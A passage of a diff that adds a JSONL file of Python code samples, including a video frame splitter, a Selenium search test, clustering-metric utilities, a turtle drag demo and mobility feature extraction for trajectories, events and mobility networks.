diff --git "a/1791.jsonl" "b/1791.jsonl" new file mode 100644--- /dev/null +++ "b/1791.jsonl" @@ -0,0 +1,783 @@ +{"seq_id":"352345357","text":"import argparse\nimport os\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\n\ndef split_video(video_path, output_dir):\n # Load input video\n cap = cv2.VideoCapture(video_path)\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n for i in tqdm(range(length)):\n ret, img = cap.read()\n if img is None:\n continue\n\n out_fn = os.path.join(output_dir, \"{:06d}.jpg\".format(i))\n cv2.imwrite(out_fn, img)\n\n cap.release()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--video_path', help='The video path')\n parser.add_argument('-o', '--output_dir', help='The output dir', default=\"./output\")\n args = parser.parse_args()\n\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n split_video(args.video_path, args.output_dir)","sub_path":"preprocess/LabelMeTools/src/virat/split_video.py","file_name":"split_video.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"635506816","text":"import os\nimport time\n\n\nimport allure\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\n\n@allure.feature('百度搜索模块测试')\nclass TestBaiduSearch:\n def get_dir(self):\n \"\"\"\n 获取当前项目地址\n :return:\n \"\"\"\n now_dir = os.getcwd()\n while True:\n now_dir = os.path.split(now_dir)\n if now_dir[1] == 'test_baidu_search':\n now_dir = os.path.join(now_dir[0], 'test_baidu_search')\n break\n now_dir = now_dir[0]\n return now_dir\n\n def setup(self):\n \"\"\"前置动作\"\"\"\n # driver_path = os.path.join(self.get_dir(),'plugin/windows/chromedriver.exe') # Windows下使用\n driver_path = os.path.join(self.get_dir(), 'plugin/linux/chromedriver') # linux下使用\n option = Options()\n option.add_argument(\"--headless\") # linux下使用无头浏览器需要添加这个参数\n option.add_argument(\"--no-sandbox\") # 表示不用跟用户运行chrome\n option.add_argument(\"--disable-dev-shm-usage\") #\n self.driver = webdriver.Chrome(executable_path=driver_path,chrome_options=option)\n self.driver.maximize_window()\n self.driver.implicitly_wait(5)\n\n def teardown(self):\n \"\"\"后置动作\"\"\"\n self.driver.quit()\n\n\n @allure.story('百度搜索测试用例')\n @pytest.mark.parametrize(\"name\", [(\"狗\"), (\"猫\"), (\"欧毅\")])\n def test_baidu_search(self, name):\n self.driver.get(\"https://www.baidu.com/\")\n time.sleep(5)\n self.driver.find_element(By.ID, \"kw\").send_keys(f\"{name}\")\n self.driver.find_element(By.ID, \"su\").click()\n time.sleep(5)\n r = self.driver.title\n assert r == f\"{name}_百度搜索\"\n","sub_path":"test_baidu_search.py","file_name":"test_baidu_search.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"68299983","text":"from __future__ import division\n\nimport sklearn\nimport numpy as np\nimport os\n\nfrom scipy.special import comb\n\n\ndef compute_a_i(contingency):\n # Return a 1xI matrix corresponding to the marginal total of data points in each of the I predicted clusters\n rep = np.sum(contingency, axis=1)\n return np.reshape(rep, (np.ma.size(rep), 1))\n\n\ndef compute_b_j(contingency):\n # Return a Jx1 matrix corresponding to the 
marginal total of data points in each of the J true clusters\n rep = np.sum(contingency, axis=0)\n return np.reshape(rep, (1, np.ma.size(rep)))\n\n\ndef pair_based_values(contingency):\n # Return the quadruplet (SS, SD, DS, DD) corresponding to the 4 categories of data pairs\n # For conveniency (since all the criteria originally use the TP, FP, FN, TN values), the name of these variables\n # in pair_based_values() and functions that use results of pair_based_values() will be tp, fp, fn, tn\n # (correspondance : tp <-> SS, fp <-> SD, fn <-> DS, tn <-> DD)\n a_i = compute_a_i(contingency)\n b_j = compute_b_j(contingency)\n N = sum(a_i)\n\n tp = np.sum(comb(contingency, 2))\n J_a_i = np.repeat(a_i, np.ma.size(b_j), axis=1)\n fp = np.sum(np.multiply(J_a_i - contingency, contingency))\n fp = 0.5 * fp\n I_b_j = np.repeat(b_j, np.ma.size(a_i), axis=0)\n fn = np.sum(np.multiply(I_b_j - contingency, contingency))\n fn = 0.5 * fn\n\n tn = np.sum(np.multiply(contingency, N - J_a_i - I_b_j + contingency))\n tn = 0.5 * tn\n\n return tp, fp, fn, tn\n\n\ndef compute_contingency(y_true, y_pred):\n # Custom calculation of contingency table, since adopted notation require IxJ contingency matrix and sklearn contingency\n # function produce JxI matrix\n tmp = np.transpose(sklearn.metrics.cluster.contingency_matrix(y_true, y_pred, sparse=False))\n return np.array(tmp, dtype='float64') # Cast to avoid overflow problems\n\ndef pair_sum_test(y_true, y_pred):\n # Simple test to check if the sum of pairs tp,fp,fn,tn from pair_based_values() is equal to\n # total possible pair : N comb 2\n contingency = compute_contingency(y_true, y_pred)\n tp, fp, fn, tn = pair_based_values(contingency)\n N = np.ma.size(y_true)\n pair_sum = tp + fp + fn + tn\n real_pair_number = comb(N, 2)\n print(\"(TP+FP+FN+TN, comb(N,2) = \", pair_sum, real_pair_number)\n\n\ndef normalize(matrix):\n # Input : Matrix of values (integer/float only), without header/footer/etc, and return a normalized matrix (by\n # feature, ie by column), using Z normalization\n instance_nb = np.size(matrix, axis=0)\n\n mean = np.mean(matrix, axis=0)\n mean = np.expand_dims(mean, 0)\n mean = np.repeat(mean, instance_nb, axis=0)\n\n std = np.std(matrix, axis=0)\n std = np.expand_dims(std, 0)\n std = np.repeat(std, instance_nb, axis=0)\n normalized_matrix = (matrix - mean) / std # Z normalization\n normalized_matrix = np.nan_to_num(normalized_matrix)\n return normalized_matrix\n\n\ndef formate():\n # Note : Function that need to be customized for each dataset that needs to be cleaned\n\n common_directory_original = \"C:/Users/Vincent/Desktop/Stage PFE/Phase 3 - Tests sur datasets/Datasets bruts de l'UCI/\"\n clean_data_directory = \"C:/Users/Vincent/Desktop/Stage PFE/Phase 3 - Tests sur datasets/Datasets propres/\"\n\n sub_directory = \"fertility\"\n filename = \"fertility_Diagnosis.txt\"\n\n\n file = common_directory_original + sub_directory + \"/\" + filename\n f = open(file, 'r')\n\n matrix = []\n header = False\n for line in f:\n if header:\n header = False\n else:\n if line.find(\"?\") == -1 and line.find(\"NaN\") == -1 and line.find(\";;\") == -1 :\n # line = line.replace(\"\\n\",\"\")\n # str = line[-13:]\n # print(str)\n # if str == \"1\\t0\\t0\\t0\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"0\"\n # if str == \"0\\t1\\t0\\t0\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"1\"\n # if str == \"0\\t0\\t1\\t0\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"2\"\n # if str == \"0\\t0\\t0\\t1\\t0\\t0\\t0\" :\n # line = line[0:-13] + \"3\"\n # if str == 
\"0\\t0\\t0\\t0\\t1\\t0\\t0\" :\n # line = line[0:-13] + \"4\"\n # if str == \"0\\t0\\t0\\t0\\t0\\t1\\t0\" :\n # line = line[0:-13] + \"5\"\n # if str == \"0\\t0\\t0\\t0\\t0\\t0\\t1\" :\n # line = line[0:-13] + \"6\"\n\n line = line.replace(\"O\",\"0\")\n line = line.replace(\"N\",\"1\")\n\n matrix = matrix + [[float(num) for num in line.split(',')]]\n\n nump = np.array(matrix)\n f.close()\n features = nump[:,:-1]\n featuresN = normalize(features)\n classes = np.array(nump[:,-1])\n\n if os.path.isfile(common_directory_original + sub_directory + \"/\" + \"features\"):\n warning = input(\"Ecraser ? (y/n)\")\n if warning == \"n\":\n return\n np.savetxt(common_directory_original + sub_directory + \"/\" + \"features\", featuresN, delimiter=',')\n np.savetxt(common_directory_original + sub_directory + \"/\" + \"classes\", classes, delimiter=',', fmt=\"%i\")\n\n np.savetxt(clean_data_directory + sub_directory +\"_features\", featuresN, delimiter=',')\n np.savetxt(clean_data_directory + sub_directory + \"_classes\", classes, delimiter=',', fmt=\"%i\")\n\ndef load_csv(path):\n # Given a file in csv format (seperator : ',') , return a file\n file = open(path,'r')\n matrix = []\n for line in file:\n matrix = matrix + [[float(num) for num in line.split(',')]]\n file.close()\n return matrix\n\ndef save_csv(path,data):\n # Save a matrix into a csv file\n np.savetxt(path, data, delimiter=',',fmt=\"%i\")","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"419580879","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 27 16:12:30 2022\n\n@author: stevenweisberg\n\"\"\"\nimport os\nimport glob\nimport pandas as pd\nimport xlrd\nimport numpy as np\n\nscriptDir = os.getcwd()\n\n# Expects that the data is one file up from the analysis script\nos.chdir(os.path.dirname(os.getcwd()))\nmasterDir = os.getcwd()\n\n\noutdir_backup = os.path.join(masterDir,'DSP_RawData','Script_Output_DO_NOT_TOUCH')\n\nfiles = glob.glob(outdir_backup + os.sep + '*.xlsx')\n\ntallies = pd.DataFrame(columns={'participant','success_40','success_60'})\n\nfor file in files:\n df = pd.read_excel(file)\n \n success_40 = df.groupby('Status')['ParticipantNo'].count()['Success']\n\n \n conds = [\n (df['Status'] == 'Success') & (df['Time Elapsed'] > 39.9),\n (df['Status'] == 'Success') & (df['Time Elapsed'] < 39.9),\n (df['Status'] == 'Failure')\n ]\n \n values = ['Failure','Success','Failure']\n \n \n df['Status_60'] = np.select(conds,values)\n \n try:\n success_60 = df.groupby('Status_60')['ParticipantNo'].count()['Success']\n except:\n success_60 = 0\n \n p_tallies = {'participant':df['ParticipantNo'][0],\n 'success_40':success_40,\n 'success_60':success_60}\n \n tallies = tallies.append(p_tallies,ignore_index=True)\n \nprint('h')","sub_path":"dspy/archive/tallySuccess.py","file_name":"tallySuccess.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"499480150","text":"import tkinter\nimport turtle\n\nsc = tkinter.Tk()\nsc.geometry(\"1000x1000+100+100\")\n\nfr4 = tkinter.Frame(sc, height=500, width=600, bd=4, bg=\"light green\", takefocus=\"\", relief=tkinter.SUNKEN)\n\nfr4.grid(row=2, column=2, sticky=(tkinter.N, tkinter.E, tkinter.W, tkinter.S))\n\n# Canvas\ncanvas = tkinter.Canvas(fr4, width=750, height=750)\ncanvas.pack()\n\n# Turtle\nturtle1 = 
turtle.RawTurtle(canvas)\nturtle1.color(\"black\")\nturtle1.shape(\"circle\")\n\n\ndef drag_handler(x, y):\n turtle1.ondrag(None) # disable event inside event handler\n turtle1.goto(x, y)\n print(x,y)\n turtle1.ondrag(drag_handler) # reenable event on event handler exit\n\nturtle1.ondrag(drag_handler)\n\nsc.mainloop()","sub_path":"Remove/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"307304238","text":"import gzip\nimport json\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\n\nfrom collections import defaultdict\nfrom scipy.spatial.distance import cdist\nfrom scipy.spatial.distance import cosine\nfrom networkx.readwrite import json_graph\n\nfrom individual_mobility_network import entropy as calculate_entropy\nfrom mobility_distance_functions import spherical_distance\nfrom tak_quadtree import lon_lat_to_quadtree_path\n\n\nclass NumpyEncoder(json.JSONEncoder):\n \"\"\" Special json encoder for numpy types \"\"\"\n def default(self, obj):\n if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64)):\n return int(obj)\n elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)):\n return float(obj)\n elif isinstance(obj, (np.ndarray,)):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef get_timeday(time):\n morning_from = datetime.datetime.strptime('06', '%H').time() # 6 hours\n afternoon_from = datetime.datetime.strptime('12', '%H').time() # 6 hours\n evening_from = datetime.datetime.strptime('18', '%H').time() # 4 hours\n night_from = datetime.datetime.strptime('22', '%H').time() # 8 hours\n if morning_from <= time < afternoon_from:\n return 0\n elif afternoon_from <= time < evening_from:\n return 1\n elif evening_from <= time < night_from:\n return 2\n else:\n return 3\n\n\ndef get_trjectory_features(trajectories):\n\n km_list = list()\n traveltime_list = list()\n speed_list = list()\n\n traj_per_day = defaultdict(int)\n km_per_day = defaultdict(float)\n traveltime_per_day = defaultdict(float)\n max_speed_per_day = dict()\n min_speed_per_day = dict()\n\n traj_per_timeday = defaultdict(int)\n km_per_timeday = defaultdict(float)\n traveltime_per_timeday = defaultdict(float)\n speed_per_timeday = defaultdict(list)\n\n for traj in trajectories.values():\n km = traj.length()\n duration = traj.duration()\n speed = km / (duration/3600)\n day = traj.start_time().date()\n time = traj.start_time().time()\n timeday = get_timeday(time)\n\n km_list.append(km)\n traveltime_list.append(duration)\n speed_list.append(speed)\n\n traj_per_day[day] += 1\n km_per_day[day] += km\n traveltime_per_day[day] += duration\n max_speed_per_day[day] = max(speed, max_speed_per_day[day]) if day in max_speed_per_day else speed\n min_speed_per_day[day] = min(speed, min_speed_per_day[day]) if day in min_speed_per_day else speed\n\n traj_per_timeday[timeday] += 1\n km_per_timeday[timeday] += km\n traveltime_per_timeday[timeday] += duration\n speed_per_timeday[timeday].append(speed)\n\n features = {\n 'tot_traj': len(trajectories),\n 'tot_km': np.sum(km_list),\n 'tot_traveltime': np.sum(traveltime_list),\n 'avg_km': np.mean(km_list),\n 'avg_traveltime': np.mean(traveltime_list),\n 'avg_speed': np.mean(speed_list),\n 'std_km': np.std(km_list),\n 'std_traveltime': np.std(traveltime_list),\n 'std_speed': np.std(speed_list),\n\n 'avg_traj_per_day': 
np.mean(list(traj_per_day.values())),\n 'avg_km_per_day': np.mean(list(km_per_day.values())),\n 'avg_traveltime_per_day': np.mean(list(traveltime_per_day.values())),\n 'avg_max_speed_per_day': np.mean(list(max_speed_per_day.values())),\n 'avg_min_speed_per_day': np.mean(list(min_speed_per_day.values())),\n 'std_traj_per_day': np.std(list(traj_per_day.values())),\n 'std_km_per_day': np.std(list(km_per_day.values())),\n 'std_traveltime_per_day': np.std(list(traveltime_per_day.values())),\n 'std_max_speed_per_day': np.std(list(max_speed_per_day.values())),\n 'std_min_speed_per_day': np.std(list(min_speed_per_day.values())),\n\n 'morning_traj': traj_per_timeday.get(0, 0),\n 'afternoon_traj': traj_per_timeday.get(1, 0),\n 'evening_traj': traj_per_timeday.get(2, 0),\n 'night_traj': traj_per_timeday.get(3, 0),\n 'morning_ntraj': traj_per_timeday.get(0, 0) / len(trajectories),\n 'afternoon_ntraj': traj_per_timeday.get(1, 0) / len(trajectories),\n 'evening_ntraj': traj_per_timeday.get(2, 0) / len(trajectories),\n 'night_ntraj': traj_per_timeday.get(3, 0) / len(trajectories),\n\n 'morning_km': km_per_timeday.get(0, 0.0),\n 'afternoon_km': km_per_timeday.get(1, 0.0),\n 'evening_km': km_per_timeday.get(2, 0.0),\n 'night_km': km_per_timeday.get(3, 0.0),\n 'morning_nkm': km_per_timeday.get(0, 0.0) / np.sum(km_list),\n 'afternoon_nkm': km_per_timeday.get(1, 0.0) / np.sum(km_list),\n 'evening_nkm': km_per_timeday.get(2, 0.0) / np.sum(km_list),\n 'night_nkm': km_per_timeday.get(3, 0.0) / np.sum(km_list),\n\n 'morning_ttime': traveltime_per_timeday.get(0, 0.0),\n 'afternoon_ttime': traveltime_per_timeday.get(1, 0.0),\n 'evening_ttime': traveltime_per_timeday.get(2, 0.0),\n 'night_ttime': traveltime_per_timeday.get(3, 0.0),\n 'morning_nttime': traveltime_per_timeday.get(0, 0.0) / np.sum(traveltime_list),\n 'afternoon_nttime': traveltime_per_timeday.get(1, 0.0) / np.sum(traveltime_list),\n 'evening_nttime': traveltime_per_timeday.get(2, 0.0) / np.sum(traveltime_list),\n 'night_nttime': traveltime_per_timeday.get(3, 0.0) / np.sum(traveltime_list),\n\n 'morning_avg_speed': np.mean(speed_per_timeday[0]) if 0 in speed_per_timeday else -1,\n 'afternoon_avg_speed': np.mean(speed_per_timeday[1]) if 1 in speed_per_timeday else -1,\n 'evening_avg_speed': np.mean(speed_per_timeday[2]) if 2 in speed_per_timeday else -1,\n 'night_avg_speed': np.mean(speed_per_timeday[3]) if 3 in speed_per_timeday else -1,\n 'morning_std_speed': np.std(speed_per_timeday[0]) if 0 in speed_per_timeday else -1,\n 'afternoon_std_speed': np.std(speed_per_timeday[1]) if 1 in speed_per_timeday else -1,\n 'evening_std_speed': np.std(speed_per_timeday[2]) if 2 in speed_per_timeday else -1,\n 'night_std_speed': np.std(speed_per_timeday[3]) if 3 in speed_per_timeday else -1,\n\n }\n\n return features\n\n\ndef get_events_features(events):\n nbr_events_per_day = defaultdict(int)\n nbr_events_per_time = defaultdict(int)\n\n nbr_events_type = defaultdict(int)\n nbr_event_type_per_day = defaultdict(lambda: defaultdict(int))\n nbr_event_type_per_time = defaultdict(lambda: defaultdict(int))\n\n nbr_event_location = defaultdict(int)\n nbr_event_location_per_day = defaultdict(lambda: defaultdict(int))\n nbr_event_location_per_time = defaultdict(lambda: defaultdict(int))\n\n nbr_events_type_locations = defaultdict(lambda: defaultdict(int))\n\n durations_list = list()\n durations_event_type = defaultdict(list)\n durations_event_location = defaultdict(list)\n\n avg_acc_list = list()\n avg_acc_event_type = defaultdict(list)\n avg_acc_event_location = 
defaultdict(list)\n\n max_acc_list = list()\n max_acc_event_type = defaultdict(list)\n max_acc_event_location = defaultdict(list)\n\n angle_list = list()\n angle_event_type = defaultdict(list)\n angle_event_location = defaultdict(list)\n\n for event in events.values():\n day = event['date'].date()\n time = event['date'].time()\n event_type = event['event_type']\n duration = event['duration']\n location = event['location_type']\n avg_acc = event['avg_acc']\n max_acc = event['max_acc']\n angle = event['angle']\n\n nbr_events_per_day[day] += 1\n nbr_events_per_time[time] += 1\n\n nbr_events_type[event_type] += 1\n nbr_event_type_per_day[event_type][day] += 1\n nbr_event_type_per_time[event_type][time] += 1\n\n nbr_event_location[location] += 1\n nbr_event_location_per_day[location][day] += 1\n nbr_event_location_per_time[location][time] += 1\n\n nbr_events_type_locations[event_type][location] += 1\n\n durations_list.append(duration)\n durations_event_type[event_type].append(duration)\n durations_event_location[location].append(duration)\n\n avg_acc_list.append(avg_acc)\n avg_acc_event_type[event_type].append(avg_acc)\n avg_acc_event_location[location].append(avg_acc)\n\n max_acc_list.append(max_acc)\n max_acc_event_type[event_type].append(max_acc)\n max_acc_event_location[location].append(max_acc)\n\n angle_list.append(angle)\n angle_event_type[event_type].append(angle)\n angle_event_location[location].append(angle)\n\n features = {\n 'tot_events': len(events),\n 'avg_events_per_day': np.mean(list(nbr_events_per_day.values())),\n 'std_events_per_day': np.std(list(nbr_events_per_day.values())),\n 'avg_events_per_time': np.mean(list(nbr_events_per_time.values())),\n 'std_events_per_time': np.std(list(nbr_events_per_time.values())),\n 'tot_duration': np.sum(durations_list),\n 'avg_duration': np.mean(durations_list),\n 'std_duration': np.std(durations_list),\n 'avg_avg_acc': np.mean(avg_acc_list),\n 'std_avg_acc': np.std(avg_acc_list),\n 'avg_max_acc': np.mean(max_acc_list),\n 'std_max_acc': np.std(max_acc_list),\n 'avg_angle': np.mean(angle_list),\n 'std_angle': np.std(angle_list),\n }\n\n for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n features['tot_events_%s' % event_type] = nbr_events_type.get(event_type, 0)\n features['tot_events_p%s' % event_type] = \\\n nbr_events_type.get(event_type, 0) / len(events) if len(events) > 0 else 0.0\n features['avg_events_per_day_%s' % event_type] = np.mean(\n list(nbr_event_type_per_day[event_type].values())) if event_type in nbr_event_type_per_day else -1\n features['avg_events_per_time_%s' % event_type] = np.mean(\n list(nbr_event_type_per_time[event_type].values())) if event_type in nbr_event_type_per_time else -1\n features['std_events_per_day_%s' % event_type] = np.std(\n list(nbr_event_type_per_day[event_type].values())) if event_type in nbr_event_type_per_day else -1\n features['std_events_per_time_%s' % event_type] = np.std(\n list(nbr_event_type_per_time[event_type].values())) if event_type in nbr_event_type_per_time else -1\n\n features['tot_duration_%s' % event_type] = np.sum(\n durations_event_type[event_type]) if event_type in durations_event_type else 0\n features['tot_duration_p%s' % event_type] = np.sum(\n durations_event_type[event_type]) / np.sum(durations_list) if event_type in durations_event_type else 0\n features['avg_duration_%s' % event_type] = np.mean(\n durations_event_type[event_type]) if event_type in durations_event_type else -1\n features['std_duration_%s' % event_type] = np.std(\n durations_event_type[event_type]) if 
event_type in durations_event_type else -1\n\n features['avg_avg_acc_%s' % event_type] = np.mean(\n avg_acc_event_type[event_type]) if event_type in avg_acc_event_type else -1\n features['std_avg_acc_%s' % event_type] = np.std(\n avg_acc_event_type[event_type]) if event_type in avg_acc_event_type else -1\n\n features['avg_max_acc_%s' % event_type] = np.mean(\n max_acc_event_type[event_type]) if event_type in max_acc_event_type else -1\n features['std_max_acc_%s' % event_type] = np.std(\n max_acc_event_type[event_type]) if event_type in max_acc_event_type else -1\n\n features['avg_angle_%s' % event_type] = np.mean(\n angle_event_type[event_type]) if event_type in angle_event_type else -1\n features['std_angle_%s' % event_type] = np.std(\n angle_event_type[event_type]) if event_type in angle_event_type else -1\n\n for location in ['0', '1', '2']:\n features['tot_events_loc%s' % location] = nbr_event_location.get(location, 0)\n features['tot_events_ploc%s' % location] = \\\n nbr_event_location.get(location, 0) / len(events) if len(events) > 0 else 0.0\n features['avg_events_per_day_loc%s' % location] = np.mean(\n list(nbr_event_location_per_day[location].values())) if location in nbr_event_location_per_day else -1\n features['avg_events_per_time_loc%s' % location] = np.mean(\n list(nbr_event_location_per_time[location].values())) if location in nbr_event_location_per_time else -1\n features['std_events_per_day_loc%s' % location] = np.std(\n list(nbr_event_location_per_day[location].values())) if location in nbr_event_location_per_day else -1\n features['std_events_per_time_loc%s' % location] = np.std(\n list(nbr_event_location_per_time[location].values())) if location in nbr_event_location_per_time else -1\n\n features['tot_duration_loc%s' % location] = np.sum(\n durations_event_location[location]) if location in durations_event_location else 0\n features['tot_duration_ploc%s' % location] = np.sum(\n durations_event_location[location]) / np.sum(durations_list) if location in durations_event_location else 0\n features['avg_duration_loc%s' % location] = np.mean(\n durations_event_location[location]) if location in durations_event_location else -1\n features['std_duration_loc%s' % location] = np.std(\n durations_event_location[location]) if location in durations_event_location else -1\n\n features['avg_avg_acc_loc%s' % location] = np.mean(\n avg_acc_event_location[location]) if location in avg_acc_event_location else -1\n features['std_avg_acc_loc%s' % location] = np.std(\n avg_acc_event_location[location]) if location in avg_acc_event_location else -1\n\n features['avg_max_acc_loc%s' % location] = np.mean(\n max_acc_event_location[location]) if location in max_acc_event_location else -1\n features['std_max_acc_loc%s' % location] = np.std(\n max_acc_event_location[location]) if location in max_acc_event_location else -1\n\n features['avg_angle_loc%s' % location] = np.mean(\n angle_event_location[location]) if location in angle_event_location else -1\n features['std_angle_loc%s' % location] = np.std(\n angle_event_location[location]) if location in angle_event_location else -1\n\n for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n if event_type in nbr_events_type_locations:\n for location in ['0', '1', '2']:\n if location in nbr_events_type_locations[event_type]:\n features['tot_events_type_%s_loc%s' % (event_type, location)] = \\\n nbr_events_type_locations[event_type][location]\n features['ptot_events_type_%s_loc%s' % (event_type, location)] = \\\n 
nbr_events_type_locations[event_type][location] / len(events)\n else:\n features['tot_events_type_%s_loc%s' % (event_type, location)] = 0\n features['ptot_events_type_%s_loc%s' % (event_type, location)] = 0.0\n else:\n for location in ['0', '1', '2']:\n features['tot_events_type_%s_loc%s' % (event_type, location)] = 0\n features['ptot_events_type_%s_loc%s' % (event_type, location)] = 0.0\n\n return features\n\n\ndef string2timedelta(s):\n if isinstance(s, str):\n t = datetime.datetime.strptime(s, '%H:%M:%S.%f') if '.' in s else datetime.datetime.strptime(s, '%H:%M:%S')\n return datetime.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)\n else:\n return s\n\n\ndef get_imn_temporal_features(imn_list, loc_dist_thr=100):\n\n imn_keys_sorted = sorted(list(imn_list.keys()))\n\n imn_key0 = imn_keys_sorted[0]\n imn_key1 = imn_keys_sorted[-1]\n imn0 = imn_list[imn_key0]\n imn1 = imn_list[imn_key1]\n if imn0 is None or imn1 is None:\n features = {\n 'delta_locations': np.nan,\n 'delta_movements': np.nan,\n 'delta_reg_locations': np.nan,\n 'delta_rg': np.nan,\n 'jaccard': np.nan,\n 'cosine': np.nan,\n 'jaccard_mov': np.nan,\n 'cosine_mov': np.nan,\n }\n\n return features\n\n delta_locations = imn1['n_locs'] - imn0['n_locs']\n delta_movements = imn1['n_movs'] - imn0['n_movs']\n delta_reg_locations = imn1['n_reg_locs'] - imn0['n_reg_locs']\n delta_rg = imn1['rg'] - imn0['rg']\n\n imn0loc = np.array([np.array(v) for v in imn0['location_prototype'].values()])\n imn1loc = np.array([np.array(v) for v in imn1['location_prototype'].values()])\n loc0 = np.arange(0, len(imn0loc))\n loc1 = np.arange(0, len(imn1loc)) + max(loc0) + 1\n sup0 = np.array([lf['loc_support'] for lid, lf in imn0['location_features'].items()])\n sup1 = np.array([lf['loc_support'] for lid, lf in imn1['location_features'].items()])\n\n graph0 = imn0['graph']\n graph1 = imn1['graph']\n if not isinstance(graph0, nx.DiGraph):\n graph0 = json_graph.node_link_graph(imn0['graph'], directed=True, multigraph=False,\n attrs={'link': 'edges', 'source': 'from', 'target': 'to'})\n\n if not isinstance(graph1, nx.DiGraph):\n graph1 = json_graph.node_link_graph(imn1['graph'], directed=True, multigraph=False,\n attrs={'link': 'edges', 'source': 'from', 'target': 'to'})\n\n sup0mov = np.array([mf['mov_support'] for mid, mf in imn0['mov_features'].items()])\n sup1mov = np.array([mf['mov_support'] for mid, mf in imn1['mov_features'].items()])\n\n dmatrix = cdist(imn0loc, imn1loc, metric=spherical_distance)\n mapping = dict()\n mapping_loc = dict()\n for j, i in enumerate(np.argmin(dmatrix, axis=0)):\n if dmatrix[i][j] < loc_dist_thr:\n if i not in mapping or dmatrix[i][j] < dmatrix[i][mapping[i]]:\n mapping[i] = j\n mapping_loc[loc0[i]] = loc1[j]\n\n for lid in loc0:\n if lid not in mapping_loc:\n mapping_loc[lid] = lid\n\n loc0to1set = set([mapping_loc[lid] for lid in loc0])\n loc1set = set(loc1)\n jaccard = 1 - len(loc0to1set & loc1set) / len(loc0to1set | loc1set)\n\n sup0remap = np.zeros(max(loc1) + 1)\n sup1remap = np.zeros(max(loc1) + 1)\n for i, v in enumerate(sup0):\n sup0remap[mapping_loc[i]] = v\n for j, v in enumerate(sup1):\n sup1remap[loc1[j]] = v\n\n cosined = cosine(sup0remap, sup1remap)\n graph0to1 = nx.relabel_nodes(graph0, mapping_loc, copy=True)\n mov0to1set = set(graph0to1.edges())\n mov1set = set(graph1.edges())\n jaccard_mov = 1 - len(mov0to1set & mov1set) / len(mov0to1set | mov1set)\n\n sup0mov_remap = np.zeros(len(mov0to1set | mov1set))\n sup1mov_remap = np.zeros(len(mov0to1set | mov1set))\n for lflt in graph0.edges():\n 
lflt_key = lflt\n if isinstance(list(imn0['location_from_to_movement'].keys())[0], str):\n lflt_key = str(lflt)\n mid = imn0['location_from_to_movement'][lflt_key]\n lflt1 = (mapping_loc[lflt[0]], mapping_loc[lflt[1]])\n index = list(graph0to1.edges()).index(lflt1)\n sup0mov_remap[index] = sup0mov[mid]\n for lflt in graph1.edges():\n lflt_key = lflt\n if isinstance(list(imn1['location_from_to_movement'].keys())[0], str):\n lflt_key = str(lflt)\n mid = imn1['location_from_to_movement'][lflt_key]\n index = list(graph1.edges()).index(lflt)\n sup1mov_remap[index] = sup1mov[mid]\n cosined_mov = cosine(sup0mov_remap, sup1mov_remap)\n\n features = {\n 'delta_locations': delta_locations,\n 'delta_movements': delta_movements,\n 'delta_reg_locations': delta_reg_locations,\n 'delta_rg': delta_rg,\n 'jaccard': jaccard,\n 'cosine': cosined,\n 'jaccard_mov': jaccard_mov,\n 'cosine_mov': cosined_mov,\n }\n\n return features\n\n\ndef get_imn_features(imn_list, event_traj2evntlist):\n\n nbr_locations = list()\n nbr_movements = list()\n nbr_reg_locations = list()\n nbr_reg_movements = list()\n radius_of_gyration = list()\n regular_radius_of_gyration = list()\n entropy = list()\n rentropy = list()\n avg_mov_length = list()\n std_mov_length = list()\n avg_mov_duration = list()\n std_mov_duration = list()\n avg_reg_mov_length = list()\n std_reg_mov_length = list()\n avg_reg_mov_duration = list()\n std_reg_mov_duration = list()\n\n density = list()\n triangles = list()\n clustering_coefficient = list()\n degree = list()\n indegree = list()\n outdegree = list()\n diameter = list()\n eccentricity = list()\n assortativity = list()\n\n l1_count = list()\n l2_count = list()\n l3_count = list()\n l1_indegree = list()\n l2_indegree = list()\n l3_indegree = list()\n l1_outdegree = list()\n l2_outdegree = list()\n l3_outdegree = list()\n l1_dcentrality = list()\n l2_dcentrality = list()\n l3_dcentrality = list()\n l1_bcentrality = list()\n l2_bcentrality = list()\n l3_bcentrality = list()\n l1_events = defaultdict(list)\n l2_events = defaultdict(list)\n l3_events = defaultdict(list)\n\n l1l2_count = list()\n l2l1_count = list()\n l1l3_count = list()\n l3l1_count = list()\n l2l3_count = list()\n l3l2_count = list()\n l1l2_betweenness = list()\n l2l1_betweenness = list()\n l1l3_betweenness = list()\n l3l1_betweenness = list()\n l2l3_betweenness = list()\n l3l2_betweenness = list()\n l1l2_events = defaultdict(list)\n l2l1_events = 